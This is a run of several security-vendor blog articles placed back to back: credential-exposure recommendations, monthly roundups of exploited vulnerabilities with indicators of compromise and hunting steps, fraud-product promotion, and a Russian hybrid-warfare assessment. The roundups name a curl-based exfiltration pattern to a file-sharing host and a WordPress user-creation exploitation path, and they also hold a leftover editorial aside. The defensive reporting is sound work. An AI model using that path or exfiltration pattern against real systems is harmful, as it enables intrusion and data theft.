What this means for security teams: Malware family names change. Takedowns create temporary disruption, not permanent resolution. Organizations that track exposure by malware family rather than only by leaked credential volume will be better positioned to understand the true source and scope of each incident.

Recommendations for Security Teams

The 2025 data points to four areas where security teams can meaningfully reduce their exposure to credential-based attacks.

1. Extend monitoring to personal devices. The majority of infostealer infections occur on personal devices used to access corporate systems — a risk that endpoint detection tools and traditional perimeter controls cannot address. Monitoring infostealer malware logs directly provides visibility into these exposures before they are weaponized.

One large automotive parts distributor found that Recorded Future surfaced stolen credentials tied to an employee's personal device — an exposure their existing tools had no visibility into and would likely never have caught.

2. Treat session cookie exposure as a critical-severity event. With 276 million credentials carrying active cookies in 2025, any infostealer-sourced credential exposure should trigger immediate session invalidation in addition to a password reset. MFA bypass via stolen cookies is not a theoretical threat — it is an observed, frequent attack pattern.

3. Automate response workflows to close the detection-to-remediation gap. The data shows that most credentials are indexed within days of theft. Organizations that have pre-built response playbooks — automatically checking Active Directory, clearing sessions, forcing resets, and notifying managers — respond in minutes rather than hours.

"We created a custom SOAR playbook using the Identity Intelligence module. This playbook takes the information of compromised corporate user accounts, runs an Active Directory check for the credentials, clears user sessions and resets the password if the account is found to be compromised. It also notifies the user's manager for email response. To date, we have processed over 330 different identity alerts. " — Bryan Cassidy, Lead Cyber Defense Engineer, 7-Eleven (UserEvidence)

4. Monitor your entire domain footprint — including subsidiaries and third parties. Some of the most consequential exposures in 2025 involved obscure subsidiaries and supply chain partners, not core corporate domains. Attackers do not limit themselves to obvious targets. Security teams shouldn't limit their monitoring to obvious domains either.

One large international financial services firm detected an infostealer on a third-party service provider's machine through Recorded Future — surfacing a supply chain exposure that would have been invisible through traditional monitoring alone.

The Recorded Future Advantage: Detection Speed – From Exfiltration to Alert in Hours

The gap between when credentials are stolen and when a security team finds out is where breaches happen. Most organizations discover compromised credentials days or weeks after the fact — through a public breach disclosure, a tip from law enforcement, or an incident that's already underway.

Recorded Future closes that gap. In 2025, 36.4% of all indexed credentials were detected within 24 hours of exfiltration, and 52.9% within one week. By the time stolen credentials are being traded or weaponized, Recorded Future customers have already been alerted.

Table 2: Exfiltration freshness breakdown (Source: Recorded Future)

Speed matters because attackers move fast. Infostealer logs are often listed for sale within hours of collection. Every day between exfiltration and detection is a day an attacker may already have access. The 15.3% of credentials not detected within a month illustrate what happens when that window stays open — extended attacker dwell time, lateral movement, and incidents that escalate into major breaches.

For Recorded Future customers, early detection is only half the equation. Pre-built integrations with Okta, Microsoft Entra ID, and SOAR platforms like XSOAR mean that when a credential alert fires, automated workflows can clear sessions, force password resets, and notify managers — without waiting for an analyst to pick up the ticket.

A large international financial services firm's Team Lead described a recent credential leak: identified and escalated in under 24 hours, triggering immediate automated remediation — exactly the outcome their team had built toward.

Appendix: Notable Passwords from 2025 Credential Exposures

The following passwords appeared most frequently across credentials indexed by Recorded Future in 2025. Their prevalence reflects the continued gap between password policies and actual user behavior — and the reason why credential monitoring cannot rely on password complexity alone as a proxy for risk.

About This Report

This report is based on data indexed by Recorded Future's Identity Intelligence Module across the full calendar year 2025. Recorded Future monitors credentials across open web, dark web, paste sites, Telegram channels, and infostealer malware logs sourced from 30+ malware families. All credential data can be processed and analyzed without storing plaintext passwords in customer-facing systems.

Find out What’s Already Exposed in Your Environment

The data in this report reflects the broader threat landscape. The question is how much of it applies to your organization specifically.

Recorded Future's complimentary Identity Exposure Assessment pulls directly from the Recorded Future Intelligence Graph to show you the volume, recency, and severity of your organization's credential exposure over the past year — including compromised employee credentials, infostealer-sourced data, and how your exposure has trended over time.

There's no commitment required. Just a clear picture of where your organization stands.

Get your complimentary Identity Exposure Assessment →

What security teams need to know:

• Microsoft dominates: Six of 13 vulnerabilities affected Microsoft products, accounting for 46% of February's findings; all were added to CISA's KEV catalog on the same day
• Supply-chain attack on Notepad++: Lotus Blossom, a suspected China state-sponsored threat actor, exploited CVE-2025-15556 to hijack Notepad++'s update channel and deliver a Cobalt Strike Beacon and the Chrysalis backdoor
• APT28 exploits MSHTML flaw: The Russian state-sponsored group leveraged CVE-2026-21513 via malicious Windows Shortcut files for multi-stage payload delivery
• Public exploits available: Four of 13 vulnerabilities have publicly available proof-of-concept code; an alleged exploit for a fifth is being advertised for sale

Bottom line: Despite a 43% drop in volume, February's vulnerabilities include named threat actor exploitation and five RCE-enabling flaws, making prioritized, intelligence-driven remediation as important as ever.

Quick Reference: February 2026 Vulnerability Table

All 13 vulnerabilities below were actively exploited in February 2026.

Table 1: List of vulnerabilities that were actively exploited in February based on Recorded Future data. *An alleged exploit for CVE-2026-21533 is being advertised for sale across Github. Recorded Future Triage was used to browse the website advertising the exploit, which can be viewed here via the Replay Monitor. (Source: Recorded Future)

Key Trends: February 2026

Vendors Most Affected

• Microsoft led with six vulnerabilities across Windows, Windows Server, Office, and Microsoft 365 products
• BeyondTrust faced a critical OS command injection flaw in Remote Support (RS) versions 25.3.1 and earlier, and Privileged Remote Access (PRA) versions 24.3.4 and earlier
• Cisco saw active exploitation of an authentication bypass in Catalyst SD-WAN infrastructure
• Additional affected vendors: Notepad++, Apple, Soliton Systems K.K., Google, and Dell

Most Common Weakness Types

• CWE-78 – OS Command Injection (tied for most common)
• CWE-693 – Protection Mechanism Failure (tied for most common)
• CWE-476 – NULL Pointer Dereference
• CWE-843 – Type Confusion
• CWE-807 – Reliance on Untrusted Inputs in a Security Decision

Exploitation Activity

Vulnerabilities associated with malware campaigns:

• Lotus Blossom (suspected China state-sponsored) exploited CVE-2025-15556 to hijack Notepad++ update traffic between June and December 2025. The campaign rotated C2 servers across three attack chains to deliver a Metasploit loader, Cobalt Strike Beacon, and a custom backdoor called Chrysalis.
• APT28 (Russian state-sponsored) exploited CVE-2026-21513 using malicious Windows Shortcut (.lnk) files with embedded HTML payloads for multi-stage payload delivery, with observed network communication to infrastructure associated with the threat group.
• UNC6201 (suspected China-nexus) exploited CVE-2026-22769 to compromise Dell RecoverPoint for VMs appliances, deploying the SLAYSTYLE web shell, BRICKSTORM backdoor, and GRIMBOLT, a C#-based backdoor with native AOT compilation to complicate detection.

Long-running exploitation activity:

• UAT-8616 exploited CVE-2026-20127, chaining it with CVE-2022-20775 to achieve root-level access on Cisco Catalyst SD-WAN systems, with Cisco Talos attributing the activity to a sophisticated threat actor and assessing that the activity dates back to at least 2023.

Priority Alert: Active Exploitation

These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.

CVE-2025-15556 | Notepad++

Risk Score: 99 (Very Critical) | CISA KEV: Added February 12, 2026

Why this matters: Lotus Blossom exploited this flaw to replace legitimate Notepad++ update packages with malicious installers, deploying Cobalt Strike and the Chrysalis backdoor to targeted users over a six-month period. The vulnerability affects the WinGUp updater used by Notepad++ versions prior to 8.8.9, which fails to cryptographically verify downloaded update metadata and installers.

Affected versions: Notepad++ versions prior to 8.8.9 (version 8.9.1 recommended)

Immediate actions:

• Update to Notepad++ version 8.9.1, released January 26, 2026
• Hunt for the malicious update.exe sample (SHA256: 4d4aec6120290e21778c1b14c94aa6ebff3b0816fb6798495dc2eae165db4566) in your environment
• Monitor for GUP.exe spawning unexpected child processes
• Review network connections for traffic to 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, 45[.]32[.]144[.]255, or 95[.]179[.]213[.]0
• Check for directories named ProShow under %APPDATA% or unexpected files in %APPDATA%\Adobe\Scripts\
• Block or alert on curl.exe uploading files to temp[.]sh

Known C2 infrastructure: 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, cdncheck[.]it[.]com, safe-dns[.]it[.]com, 95[.]179[.]213[.]0

Detection resources: Insikt Group created Sigma rules to detect update.exe's execution of reconnaissance commands (whoami, tasklist, systeminfo, and netstat -ano) and curl commands for system information exfiltration, available to Recorded Future customers.

Figure 1: Risk Rules History from Vulnerability Intelligence Card® for CVE-2025-15556 in Recorded Future (Source: Recorded Future)

• Latin America faces a distinct and evolving cyber threat landscape, from PIX payment fraud to ransomware hitting critical infrastructure.
• Most LATAM security teams are still reactive by necessity, and that posture is costing organizations in downtime, data, and trust.
• Recorded Future offers LATAM-specific threat intelligence, automation, and 100+ integrations to help stretched teams get ahead of attacks before they land.
• Meet us at RSA Booth N-6090 to see how intelligence-led security can transform your team's posture, from response to prevention.
• Join our upcoming webinar to learn what proactive intelligence looks like for your region.
  Understanding the Dark Covenant, Its Evolution, and Impact

Available for purchase now via the Recorded Future Platform, Money Mule Intelligence helps fraud teams identify the accounts criminals use to extract and move stolen funds—addressing a critical gap as scams increasingly become banks' most pressing fraud challenge.

The Growing Threat of Authorized Push Payment Fraud

Authorized Push Payment (APP) fraud is accelerating. In the U.S., APP fraud losses are projected to reach nearly $15B by 2028, up from $8.3B in 2024, according to Deloitte. While traditional card fraud continues to decline, APP fraud is climbing, fueled by AI-generated deepfakes, personalized scam scripts, and instant payment systems like FedNow and Zelle that move money faster than conventional fraud controls can intercept it.

Mule accounts, or money mules, are part of the critical infrastructure that makes these scams possible. They provide the bridge that converts stolen payments into untraceable cash or cryptocurrency. Without them, most APP fraud would collapse because criminals cannot risk receiving funds directly into their own accounts. By the time victims realize they've been scammed, mule accounts have already moved the money through multiple layers, typically ending in cash withdrawals or crypto conversions.

Additionally, the sophistication of mule operations is increasing. Criminal organizations now employ "mule herders" who manage hundreds of accounts at once, using AI to simulate normal transaction behavior (grocery purchases, streaming subscriptions, etc.) so accounts don't appear dormant or suspicious. This makes detection through traditional pattern analysis increasingly difficult.

Regulators are responding by shifting liability to banks, often viewing those allowing mule accounts to operate as part of the criminal infrastructure itself. For example, the UK now requires banks to reimburse scam victims and allows them to delay suspicious payments for investigation, while U.S. regulators are signaling that banks may be held liable for failing to detect mule accounts.

Detecting mule accounts is fundamentally difficult. They’re designed to blend in with legitimate activity, and traditional fraud controls can struggle to distinguish between a genuine customer payment and a scam transfer until it's too late.

CYBERA's Approach to Mule Intelligence

The challenge of detecting and disrupting mule account networks is what led CYBERA's founders to build their solution. Coming from legal practice and law enforcement, CYBERA's leadership team worked scam cases where they witnessed how recovery becomes impossible once funds move through the financial system. They realized that money mule networks represent a central vulnerability in the scam economy, one that banks had limited visibility into.

Today, CYBERA helps banks and payment networks disrupt scams at the point where funds are extracted. CYBERA's AI-powered Scam Engagement System generates intelligence on bank accounts and payment endpoints actively used by scam networks.

Unlike probabilistic risk scoring, CYBERA verifies each account, providing evidence and contextual metadata to enable proactive prevention across both internal accounts and outbound payments while minimizing false positives.

CYBERA supports two core use cases:

• On-Us Mule Detection, which helps identify mule accounts held at your institution that are already linked to confirmed scam activity. This enables early detection and disruption of high-risk accounts, reducing downstream fraud, repeat victimization, and regulatory exposure within a bank’s accountholders.
• Off-Us Screening, which screens outbound payments to external beneficiary accounts before execution, helping to prevent customers from sending funds to scammer-controlled accounts. This is particularly valuable for high-value transfers, social engineering attacks, and customer-initiated payments where traditional controls are limited.

Large financial institutions have already prevented multiple six-figure losses by embedding CYBERA’s intelligence into their transaction monitoring workflows. CYBERA has also been accepted as a member of the Mastercard Start Path program, making it the first Recorded Future partner to achieve this distinction and further validating its role in the payments ecosystem.

How Money Mule Intelligence Expands Payment Fraud Intelligence

Payment Fraud Intelligence (PFI) correlates the widest set of disparate, pre-monetization indicators of fraud to help teams act before their customers are impacted. Money Mule Intelligence extends that capability, giving fraud teams the verified intelligence needed to make high-confidence decisions that disrupt scams by flagging accounts that have been confirmed as mule infrastructure through direct investigation. Together, they provide coverage from initial compromise through attempted cash-out, helping fraud teams prevent losses at multiple intervention points.

As regulators increasingly expect banks to prevent scam-enabled transfers, Money Mule Intelligence provides the verified data needed to comply with emerging reimbursement requirements while reducing the operational burden of post-incident investigation and remediation.

PFI users that purchase this capability, can now act on both sides of the transaction—compromised payment instruments and scam-linked receiving accounts—with evidence-backed intelligence that minimizes false positives and aligns with the industry's shift toward proactive fraud prevention.

What security teams need to know:

• APT28's Operation Neusploit: Russian state-sponsored actors exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files, delivering MiniDoor, PixyNetLoader, and Covenant Grunt implants
• Microsoft and SmarterTools lead concerns: These vendors accounted for 30% of January's vulnerabilities, with multiple critical authentication bypass and RCE flaws
• Public exploits proliferate: Fourteen of the 23 vulnerabilities reported have public proof-of-concept exploit code available
• Code Injection dominates: CWE-94 (Code Injection) was the most common weakness type, followed by CWE-288 (Authentication Bypass Using an Alternate Path or Channel) and CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)

Bottom line: The slight increase masks significant threats. APT28's zero-day exploitation and multiple critical authentication bypass flaws demonstrate that threat actors continue targeting enterprise communication and management platforms for initial access and persistence.

Quick Reference Table

All 23 vulnerabilities below were actively exploited in January 2026.

Table 1: List of vulnerabilities that were actively exploited in January based on Recorded Future data (Source: Recorded Future)

Key Trends in January 2026

Affected Vendors

• Microsoft faced four critical vulnerabilities across Windows and Office products, including APT28's zero-day exploitation of CVE-2026-21509
• SmarterTools accounted for three critical vulnerabilities affecting SmarterMail, all enabling authentication bypass or RCE
• Cisco saw two critical flaws in Identity Services Engine and Unified Communications Manager
• Ivanti dealt with two pre-authentication RCE vulnerabilities in Endpoint Manager Mobile
• Additional affected vendors/projects: Fortinet, SolarWinds, Broadcom, Synacor, Versa, Hewlett Packard Enterprise, GNU, Linux, Vite, Prettier, Gogs, and Modular DS

Most Common Weakness Types

• CWE-94 – Code Injection
• CWE-288 – Authentication Bypass Using an Alternate Path or Channel
• CWE-200 – Exposure of Sensitive Information to an Unauthorized Actor

Threat Actor Activity

APT28's Operation Neusploit marked January's most sophisticated campaign:

• Exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files
• Deployed MiniDoor, a malicious Outlook VBA project designed to collect and forward victim emails to hardcoded addresses
• Deployed PixyNetLoader, which staged additional components and culminated in a Covenant Grunt implant
• Abused Filen API as a C2 bridge between the implant and actor-controlled Covenant listener

Priority Alert: Active Exploitation

These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.

CVE-2026-21509 | Microsoft Office

Risk Score: 99 (Very Critical) | Active exploitation by APT28

Why this matters: Zero-day exploitation by Russian state-sponsored actors bypasses Office security features, enabling delivery of email collection implants and backdoors. The vulnerability stems from reliance on untrusted inputs in security decisions, allowing unauthorized attackers to bypass OLE mitigations.

Affected versions: Microsoft 365 and Microsoft Office (versions not specified in advisory)

Immediate actions:

• Install Microsoft's out-of-band update released January 26, 2026
• Search email systems for RTF attachments with embedded malicious droppers
• Check for modifications to %appdata%\Microsoft\Outlook\VbaProject.OTM
• Review registry keys: HKCU\Software\Microsoft\Office\16.0\Outlook\Security\Level, Software\Microsoft\Office\16.0\Outlook\Options\General\PONT_STRING, and Software\Microsoft\Office\16.0\Outlook\LoadMacroProviderOnBoot
• Monitor for connections to 213[.]155[.]157[.]123:443 and remote connectivity to Microsoft Office CDN endpoints
• Hunt for scheduled tasks named "OneDriveHealth" and suspicious files in %programdata%\Microsoft\OneDrive\setup\Cache\SplashScreen.png
• Block email addresses: ahmeclaw2002@outlook[.]com and ahmeclaw@proton[.]me

Figure 1: Vulnerability Intelligence Card® for CVE-2026-21509 in Recorded Future (Source: Recorded Future)

CVE-2026-23760 | SmarterTools SmarterMail

Risk Score: 99 (Very Critical) | CISA KEV: Added January 26, 2026

Why this matters: Unauthenticated attackers can reset system administrator passwords without any credentials or prior access, enabling complete administrative takeover and potential RCE through volume mount command injection.

Affected versions: SmarterTools SmarterMail prior to build 9511

Immediate actions:

• Upgrade to build 9511 or later immediately
• Review administrator account activity logs for unauthorized password resets
• Check Volume Mounts configuration for suspicious command entries (this one IS correct for SmarterMail)
• Review administrator access patterns and session logs
• Audit system for unauthorized changes made with compromised admin access

CVE-2026-1281 & CVE-2026-1340 | Ivanti Endpoint Manager Mobile

Risk Score: 99 (Very Critical) | CISA KEV: CVE-2026-1281 added January 29, 2026

Why this matters: Pre-authentication RCE vulnerabilities in EPMM enable unauthenticated attackers to execute arbitrary code by exploiting Apache RewriteMap helper scripts that pass attacker-controlled strings to Bash.

Affected versions: Ivanti EPMM 12.5.0.0 and earlier, 12.5.1.0 and earlier, 12.6.0.0 and earlier, 12.6.1.0 and earlier, and 12.7.0.0 and earlier

Immediate actions:

• Install temporary fixes via RPM packages: EPMM_RPM_12.x.0 - Security Update - 1761642-1.0.0S-5.noarch.rpm and EPMM_RPM_12.x.1 - Security Update - 1761642-1.0.0L-5.noarch.rpm
• Plan migration to EPMM 12.8.0.0 (scheduled for Q1 2026 release)
• Monitor for unusual Apache RewriteMap activity
• Review logs for crafted HTTP parameters to app store retrieval routes
• Check for unauthorized code execution attempts via RewriteRule handling

Exposure: EPMM instances accessible over corporate networks or VPN connections

Figure 2: Risk Rules History from Vulnerability Intelligence Card® for CVE-2026-1340 in Recorded Future (Source: Recorded Future)

Technical Deep Dive: Exploitation Analysis

APT28's Operation Neusploit (CVE-2026-21509)

The multi-stage attack chain: CVE-2026-21509 enables bypass of Office OLE mitigations through weaponized RTF files:

• Initial delivery – Specially-crafted RTF file exploits CVE-2026-21509
• Server-side evasion – Malicious DLL returned only for requests from targeted geographies with an expected HTTP User-Agent
• Dropper variants – Two distinct infection paths deployed based on targeting:
  • Variant 1 (MiniDoor): Writes VBA project to Outlook, modifies registry settings to enable macro execution, forwards emails to hardcoded recipient addresses
  • Variant 2 (PixyNetLoader): Creates mutex asagdugughi41, decrypts embedded payloads using rolling XOR key, establishes persistence via COM hijacking

Why this matters: APT28 demonstrates sophisticated exploitation combining zero-day vulnerabilities with anti-analysis techniques, targeting government and business users for email collection and persistent access.

Modular DS WordPress Plugin Exploitation (CVE-2026-23550 & CVE-2026-23800)

The authentication bypass chain: CVE-2026-23550 enables administrator-level access without authentication:

• Plugin treats requests as trusted based on request-supplied indicators rather than cryptographic verification
• /api/modular-connector/login flow grants access based on site connector enrollment state
• If no user identifier is supplied, the code selects an existing administrative user and establishes a privileged session
• CVE-2026-23800 represents the second exploitation path via REST API user creation: /?rest_route=/wp/v2/users&origin=mo&type=x

Known IoCs associated with CVE-2026-23550:

• 45[.]11[.]89[.]19
• 185[.]196[.]0[.]11
• 64[.]188[.]91[.]37

Known IoCs associated with CVE-2026-23800:

• 62[.]60[.]131[.]161
• 185[.]102[.]115[.]27
• backup[@]wordpress[.]com
• backup1[@]wordpress[.]com

Why this matters: WordPress plugin vulnerabilities enable threat actors to compromise multiple sites from a single centralized management platform, amplifying attack impact.

SmarterMail Authentication Bypass (CVE-2026-23760)

The password reset flaw: CVE-2026-23760 exposes privileged password reset to anonymous callers:

• ForceResetPassword controller attribute explicitly permits unauthenticated access
• Backend ForcePasswordReset routine branches on client-supplied IsSysAdmin boolean rather than deriving account type from server-side context
• System administrator branch performs basic checks, then sets Password directly from the supplied NewPassword
• Logic fails to validate OldPassword, lacks an authenticated session requirement, and omits authorization controls

Why this matters: Complete administrative takeover without credentials enables threat actors to deploy web shells, modify configurations, and establish persistent access to mail server infrastructure.

Detection & Remediation Resources

Nuclei Templates from Insikt Group®

Recorded Future customers can access Nuclei templates for:

• CVE-2025-8110 (Gogs) - Version detection and fingerprinting check
• CVE-2026-23760 (SmarterMail) - Authentication bypass validation

Recorded Future Product Integrations

• Vulnerability Intelligence – Prioritize based on active exploitation data, including APT28 targeting
• Attack Surface Intelligence – Discover exposed SmarterMail, Ivanti EPMM, and Modular DS assets
• Third-Party Intelligence – Monitor vendor vulnerabilities across your supply chain

January 2026 Summary

State-sponsored zero-days return. APT28's exploitation of CVE-2026-21509 demonstrates continued Russian interest in email collection and persistent access through Office vulnerabilities.

Authentication bypass dominates enterprise risk. Multiple critical flaws in SmarterMail, Modular DS, and Cisco products enable complete administrative takeover without credentials.

Legacy vulnerabilities persist. CVE-2009-0556 (Microsoft Office) highlights how threat actors continue targeting unretired systems where patching has lagged for over a decade.

Take Action

Ready to see how Recorded Future can help your team detect state-sponsored exploitation, prioritize authentication bypass fixes, and reduce enterprise attack surface? Explore our demo center for live examples, or dive deeper with Insikt Group research for technical threat intelligence.

About Insikt Group®:

Recorded Future's Insikt Group® is a team of elite analysts, linguists, and security researchers providing actionable intelligence to protect organizations worldwide. Our research combines human expertise with AI-powered analytics to deliver timely, relevant threat intelligence on emerging vulnerabilities and threat actor campaigns.

Since its full-scale invasion of Ukraine in February 2022, Russia has waged what we assess is largely opportunistic, though increasingly aggressive, hybrid warfare in NATO territory. Moscow has very likely not yet leveraged its full capability to integrate cyber, political, and sabotage tools into a full-scale campaign.

Over the next two years, Russian President Vladimir Putin will likely escalate Russia’s hybrid warfare campaign against NATO members into a full-fledged campaign likely consistent with a Russian military doctrine called New Generation Warfare (NGW). Putin will likely use this campaign to degrade NATO political unity and defense capabilities, reinforce Russia’s network of overt and covert assets across NATO, and optimize the physical and political environment, should Putin decide to launch a military incursion into NATO territory.

In a full-scale NGW campaign in NATO territory, Russia would likely move from its current pattern of influence operations efforts combined with largely opportunistic cyber and sabotage targeting to a Europe-wide campaign that is more intentionally planned and aims to project Russian power and weaken European defenses on a systemic level. An NGW campaign would very likely involve Russia using the same tactics it is currently using, including sabotage operations, influence operations, territorial waters and airspace violations, and exploitation of some NATO states’ dependence on Russian oil and gas. The primary differences between Russia’s current operations in Europe and an NGW campaign would include greater geographic breadth of those operations; greater frequency of operations; and Russia likely using tactics simultaneously and in coordinated ways. For example, likely Russia-directed threat actors might use a drone to violate the airspace over a NATO state’s airport, forcing the temporary closure of that airport, coupled with a distributed denial-of-service attack on the airport’s internal communications system. Russia might then post a video of the incidents through one of its overt or covert propaganda outlets, arguing that they show NATO cannot adequately protect its aviation network.

An NGW campaign in NATO territory would very likely have significant implications for private and public sector entities, including degradation of critical infrastructure, reputational risk for individuals and companies named in Russian influence operation campaigns, and reduced public confidence in the government’s ability to ensure their safety.

Over the next three to five years, Putin will likely evaluate the feasibility of moving from an NGW-like campaign in Europe to a kinetic military incursion. Factors Putin would likely weigh when making such a decision include NATO military capabilities, the likelihood that the US would defend a NATO state if it were attacked, and Russian military capabilities. However, even if the necessary conditions for such an operation emerge, the probability of a proactive Russian military operation into NATO territory very likely remains low.

Key Findings

• Russia’s hybrid warfare campaign in NATO territory between February 2022 and January 2026 has been increasingly aggressive, but likely opportunistic and not reflective of Russia’s full cyber, influence operations, and sabotage capabilities.
• Putin likely views the next two years as an opportunity to test NATO’s defensive capabilities and prepare the physical and psychological environment, should he decide to launch a military incursion. Putin likely assesses that the 2028 US presidential election could lead to a US president more willing to commit US resources to NATO. As such, Putin likely views the next two years as an opportunity to exploit existing US-NATO tensions to weaken NATO’s unity and ability to defend itself.
• Russia’s escalated aggression against NATO over the next two years is likely to have the hallmarks of a Russian military doctrine called New Generation Warfare (NGW), which combines sabotage operations, cyberattacks, influence operations, and other non-military actions to undermine the enemy’s confidence and prepare the physical and psychological environment, should Russia elect to escalate into a kinetic military campaign.
• A full-scale NGW campaign would likely involve an intensified campaign of tactics Russia has used against NATO in the last few years, including sabotage operations, influence operations, violations of NATO airspace with drones and jets, violations of NATO states’ territorial waters, targeting of undersea cables, and exploitation of some NATO states’ dependence on Russian gas and oil. Russia would likely deploy these tactics more frequently, across more states simultaneously, and would likely use tactics simultaneously in an attempt to strain NATO resources.
• A full-scale NGW campaign would have significant implications for private and public sector entities operating in NATO territory, including disruption to critical services, reputational risk for individuals and firms named in influence campaigns, supply chain disruptions, and reduced public trust in the government’s ability to safeguard critical infrastructure. The fact that most of the critical infrastructure in NATO territory is privately owned means public-private partnerships will be essential in mitigating the impact of escalated Russian aggression.

Russia Likely to Escalate into New Generation Warfare Campaign in Europe Over Next Two Years

Since Russia’s full-scale invasion of Ukraine in February 2022, it has waged what Insikt Group assesses is largely opportunistic, though increasingly aggressive, hybrid warfare in Europe. These actions, though destructive, have very likely not leveraged Russia’s full capability to integrate cyber, political, and sabotage tools into a full-scale campaign.

Nonetheless, Russian president Vladimir Putin very likely still prioritizes weakening European unity and defensive capabilities in service to his overarching foreign policy goal of replacing the US-led international system with a multipolar world in which Russia, the US, and China are relatively equal in terms of geopolitical influence. Putin very likely judges that uneven US assistance to European defensive efforts creates a window of opportunity for Russia to weaken Europe’s ability to resist Russian aggression. Putin likely views recent US-NATO tensions, such as the US’s articulated intention to control Greenland, as an opportunity to exacerbate the strategic distance between the US and NATO, thereby weakening the transatlantic partnership that has formed the core of the US-led, post-World War II security architecture. Putin also likely views the next two years as an opportunity to optimize the physical and informational environment in Europe, should he decide to launch a kinetic military attack against Europe.

Putin very likely views this window of opportunity as finite. He likely recognizes that the 2028 US presidential election could result in a US president more willing to commit US military and political resources to amplifying Europe’s defensive capabilities. As such, over the next two years, Putin will likely escalate Russia’s hybrid warfare against Europe into an expanded campaign that is likely consistent with the principles of Russian New Generation Warfare (NGW) –– a warfare doctrine espoused by senior Russian military officials emphasizing control of the information and psychological spaces, as well as the use of undeclared special forces, to weaken an enemy prior to using traditional military forces.

Europe’s efforts to bolster its defenses against current levels of Russian hybrid warfare likely reinforce Putin’s perception that Europe is motivated to weaken Russia, thereby likely making him more motivated to target Europe. Putin’s perception that Europe’s defensive efforts are actually a threat to Russia is likely rooted in his calculus that NATO is fundamentally an anti-Russia bloc. Putin has substantiated this assessment by pointing to actions such as NATO’s expansion to include former Warsaw Pact countries and its decision to install missile defense systems in Poland.¹

New Generation Warfare Origins and Principles

Insikt Group assesses that much of Russia’s aggressive foreign policy actions since the annexation of Crimea in March 2014 –– which marked the beginning of Putin’s more assertive efforts to push back against perceived Western efforts to weaken Russia –– have been consistent with NGW, a Russian doctrine in which the state aims to bring about political change in another country primarily by using overt and covert influence tools, as opposed to conventional military force. These tools can include influence operations, sabotage operations, and exploiting economic leverage.

New Generation Warfare is typically associated with Chief of the General Staff Valery Gerasimov’s 2013 article in the Russian journal Military-Industrial Kurier, though NGW is essentially a modern version of Soviet active measures. “Active measures” (aktivnye meropriyatiya) was a term used by the Soviet Union from the 1950s onwards to describe covert influence and subversion operations, including establishing front organizations, backing pro-Soviet political movements abroad, and attempting to orchestrate regime change in foreign countries. Active measures declined during the 1980s and 1990s, but Putin revived its use in the early 2000s. Indeed, in 2007, retired major-general Alexander Vladimirov alluded to that revival when he stated that “modern wars are waged on the level of consciousness and ideas” and that “modern humanity exists in a state of permanent war” in which it is “eternally oscillating between phases of actual armed struggle and constant preparation for it.”²

Despite the long history of Russia using active measures, Gerasimov’s 2013 article provides the most comprehensive account of how current Russian military leaders likely view this doctrine. Gerasimov’s article suggests that he views NGW both as the reality of modern warfare and as a preferred way of weakening enemies. Gerasimov argued that the Arab Spring demonstrated that modern wars are not declared conflicts between traditional militaries, but instead depend more on a combination of declared military force and tactics such as domination of the information space, targeting of critical enemy facilities, “asymmetric and indirect operations,” and the use of unofficial special forces. He argued that “the very ‘rules of war’ have changed. The role of nonmilitary means of achieving political and strategic goals has grown and, in many cases, they have exceeded the power of force of weapons in their effectiveness.”

The following table, taken from a translation of the article, shows Gerasimov’s view of traditional warfare as opposed to New Generation Warfare:

Figure 1: New Generation Warfare and traditional warfare forms and methods (Source: Military Review)

We assess that Russia’s campaign in Ukraine, starting with the annexation of Crimea in March 2014 and extending to its ongoing full-scale military operation, bears many of the hallmarks of NGW. Russia’s military operations more closely aligned with NGW principles from 2014 through 2021; after Russia’s full-scale invasion of Ukraine in February 2022, the Russian military transitioned to more traditional operations. Russia’s exploitation of influence operations and asymmetric warfare has been a feature of its operations since 2014, and since 2022, Russia has expanded asymmetric and sabotage operations in Europe likely as part of a multi-faceted strategy to use power exertion in Ukraine and Europe to weaken the Western geopolitical system.

This does not mean that Russian military leadership have consciously used NGW as their guiding principle in Ukraine at all times; indeed, we lack the insight into Russian military leadership thinking to assess with high confidence the principles they are employing. Rather, the combination of Gerasimov’s writings and observation of Russian operations in Ukraine means we can assess with medium confidence that Russia’s Ukraine operations prior to 2022 often reflected NGW principles. As such, we assess that NGW is a useful framework for understanding Russian military operations.

Table 1: New Generation Warfare principles (Source: Recorded Future)

New Generation Warfare Toolkit

In a full-scale New Generation Warfare campaign in Europe, Russia would likely move from its current pattern of influence operations efforts combined with largely opportunistic cyber and sabotage targeting to a Europe-wide campaign that is both proactive and reactive. It would likely involve the same tactics Russia has used against NATO states for the past few years. The difference would likely be that Russia would deploy these tactics more frequently and across a greater number of states at once. A full NGW campaign would likely also involve using some operational methods simultaneously and in ways that amplify one another.

Even in a full-scale NGW campaign, Russia would very likely aim to keep destruction below the threshold that risks NATO invoking Article 5. NATO officials have not specified precisely what the Article 5 threshold is; indeed, former NATO Secretary General Jens Stoltenberg stated that the grounds for invoking Article 5 “must remain purposefully vague.” However, it is likely that it would include a mass casualty event or the use of a chemical or biological weapon. The text of Article 5 specifies that the threshold involves “an armed attack.” NATO officials said in 2022 that a cyberattack could constitute grounds for invoking Article 5, though they did not specify what kind of cyberattack would qualify.

Russia is likely to face few downsides during an NGW campaign, due to minimal risk of Russian casualties and the campaign’s tactical flexibility. Unlike a conventional military campaign, which risks a high level of casualties that can cause domestic public dissatisfaction, an NGW campaign very likely would involve minimal risk to Russian citizens. In addition, an NGW campaign inherently offers significant tactical flexibility, as it is not a declared campaign in which Russia needs to articulate goals to justify the campaign to the Russian public and elites. As such, Putin would likely have the option to draw down tactics that are proving less effective and increase the use of more effective tactics, without needing to justify tactical failures. This flexibility would likely allow Putin to continue at least aspects of an NGW campaign in the likely event that Europe responds to an NGW campaign with escalated efforts to counter Moscow.

Influence Operations and Propaganda

